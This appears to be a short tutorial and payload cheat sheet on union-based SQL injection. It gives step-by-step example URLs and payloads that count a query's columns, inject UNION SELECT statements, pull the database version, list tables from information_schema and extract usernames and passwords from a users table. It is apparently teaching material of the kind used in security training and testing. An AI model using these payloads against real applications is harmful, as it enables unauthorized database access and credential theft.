Union-Based SQL Injection

What is Union-Based SQL Injection?

Union-Based SQL Injection uses the SQL UNION operator to combine the results of two or more SELECT statements. This allows the attacker to retrieve data from other tables.

How it works:

• The attacker uses the UNION operator to combine the results of two SELECT queries into a single result set.
• The data is displayed directly in the application’s normal output (e.g., in a table, list, or page content).

Key Point:

• The attacker directly retrieves data by appending their own SELECT query to the original query using UNION.

Steps to Exploit Union-Based SQL Injection

1. Find the Number of Columns:

   • Use ORDER BY to determine the number of columns in the original query.

   • Example: If the application returns an error at ORDER BY 3, it means there are 2 columns.

     <http://example.com/products?id=1> ORDER BY 1--
     <http://example.com/products?id=1> ORDER BY 2--
     <http://example.com/products?id=1> ORDER BY 3--
     
     

2. Inject the UNION Query:

   • Use UNION SELECT to combine the results of the original query with the injected query.

   • Example: If the application is vulnerable, it will display the results of both the original query and the injected query.

     <http://example.com/products?id=1> UNION SELECT 'test', 'test'--
     
     

3. Extract Data:

   • Retrieve data from other tables using the UNION SELECT statement.

   • Example: Extract usernames and passwords from a users table:

     <http://example.com/products?id=1> UNION SELECT username, password FROM users--
     
     

Union-Based SQL Injection Payloads

Here are some example payloads for Union-Based SQL Injection:

1. Find the Number of Columns:

   ORDER BY 1--
   ORDER BY 2--
   ORDER BY 3--
   
   

2. Inject Dummy Data:

   UNION SELECT 'test', 'test'--
   
   

3. Extract Database Version:

   UNION SELECT version(), NULL--
   
   

4. Extract Table Names:

   UNION SELECT table_name, NULL FROM information_schema.tables--